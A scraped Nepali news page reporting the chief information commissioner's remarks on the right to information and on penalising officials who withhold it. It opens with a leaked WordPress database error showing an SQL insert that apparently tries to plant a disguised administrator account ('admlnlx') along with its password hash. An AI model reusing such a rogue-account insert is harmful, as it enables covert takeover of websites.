WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1y2vrD/uPQZzTGx.hzCsIjhpD7hQ60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 10:10:39', '', 'admlnlx', 'admlnlx')
मकवानपुर, पुस ८ –
राष्ट्रिय सूचना आयोगका प्रमुख सूचना आयुक्त कृष्णहरी बाँस्कोटाले सूचना नदिएमा कारवाही गर्छौं भनेर कर्मचारीको घाँटी नन्याकिकन सूचना दिने अवस्था नरहेको बताउनुभएको छ ।
उहाँले नागरिकले सूचना माग गरेकै आधारमा सरकारी निकायमा हुने धेरै खालका भ्रष्टाचार कम हुँदै जाने बताउनुभयो । शुक्रबार हेटौँडामा भएको एक कार्यक्रममा बाँस्कोटाले सूचनाको हकलाई प्रभावकारी बनाउनका लागि आफू लागि परेकोे बताउनुभयो
उहाँले समयमा सूचना नदिएकै आधारमा कर्मचारीलाई दण्डित गर्दा पुनरावेदन अदालतले आयोगबाट भएका धेरै फैसला उल्टाएको बताउनुभयो । सचेतनाको चरण पार गरी आयोग अब कारवाहीको प्रक्रियामा अघि बढेको उहाँले दाबी गर्नुभयो ।